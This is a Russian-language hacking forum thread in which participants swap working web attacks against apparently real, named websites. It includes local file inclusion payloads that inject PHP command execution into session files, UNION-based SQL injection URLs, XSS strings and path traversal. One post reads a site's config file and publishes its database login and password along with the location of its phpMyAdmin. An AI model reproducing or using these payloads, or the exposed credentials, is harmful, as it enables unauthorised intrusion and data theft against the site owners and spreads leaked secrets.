в куках может быть только идентификатор сессии и всё, но мыло и другие данные, введенные при регистрации, например, могут быть отображены в сессии при её инклуде
вообщем наконец все поняли што я вас необманую... да /etc/passwd необязательная конструкция... но она проходит.. писал просто для наглядности...
тыже толькошто писал што никогда неслышал про такую уязвимость а тут уже пишеш как будто ты ее 1000 раз юзал штото тут попахивает.....
Для наглядности чего? Объясни плз в каком случае нужно использовать именно твой вариант, при инклуде из сессии. Т.е. когда нужни использовать: ?page=/etc/passw%00< system($_GET['cmd']); ?> и невозможно использовать просто вот это: ?page=< system($_GET['cmd']); ?>
http://www.gexecutives.com /job.php?ID=-208+union+select+1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17,18+from+infor mation_schema.columns+and+column_name>'some_column'--
Всем привет. Я xss недавно начал изучать. Подскажите <script>alert()</script> я вбиваю вообще в любое поле на сайте? Так?
Универсальнее "><script>alert()</script> или '><script>alert()</script> Что бы в случае чего,закрыть предидущий тег.В любом случае,лишним не будет,но может помочь.
http://hotel.1000turov.ru/hoteld2.php?id=1294367249+order+by+1-- начинаю применять union+select и результатов нет, в чем проблема?
Code: http://hotel.1000turov.ru/hoteld2.php?id=../../../../../../../../home/chobot/hotel.1000turov.ru/www/hoteld2.php
Спасибо всем за подробные ответы,но есть ещё одна идейка.Используя вышеприведённые методы,нужно знать,значения каких переменных записывается в сессию...а двиг самописный. Возникла идея скопировать код загружаемого скрипта в директорию,доступную для записи.Подозрения на невыполнение кода именно в директории загруженных файлов.Поскольку скрипты выполняются,можно попробовать последовательность команд,но не уверен... P.S.: Файлы сессий 100% инклудятся и хранятся в /tmp (вчера проверял).Буду искать переменные сессий,поскольку двиг мне неизвестен.
m0Hze, а какие именно? Можешь привести примеры?) Pashkela, спб, но если честно, я не понял что дает твой линк
гораздо круче обычной скули, обычная читалка, но последствия ужасные для админа могут быть: Code: http://hotel.1000turov.ru/hoteld2.php?id=../../../../../../../../home/chobot/1000turov.ru/www/inc/my.php смотрим сорцы, а там: <?php $connection = mysql_connect("localhost", "ayen", "chobot"); mysql_select_db("chobot", $connection); ?> ну и осталось только phpmyadmin найти, что тоже оказалось легко: Code: http://hotel.1000turov.ru/myadmin/ дел ровно на 1 минуту. Привелегии не проверял (но новую БД почему-то можно создавать, гы)
Как ни странно,мой способ сработал))).Теперь смогу попробовать ваши(исходники теперь будут).Выражаю огромною благодарность ).
включить хек-догадку на 45% Если у тебя есть инклуд - причем здесь админка? А вообще задавай вопросы конкретно, сам перечитай, что пишешь - с ума можно сойти, пока вгонишь, о чем вообще речь, предлагаешь всем мотать по три страницы назад? "Свой метод прокатил" - ты о чем вообще? Язык борется за независимость от мозгов?
Не понимаю,чего ты не понял.По-моему,я ясно дал понять,что решил проблему. НОВЫЙ АБЗАЦ - НОВАЯ МЫСЛЬ Когда я лазил по серваку с шелла,то нашёл админку за пределами docroot.Да,у меня есть инклуд,но меня интересует,как ею вообще люди пользуются. P.S.: Можно было ответить и в более вежливой форме.
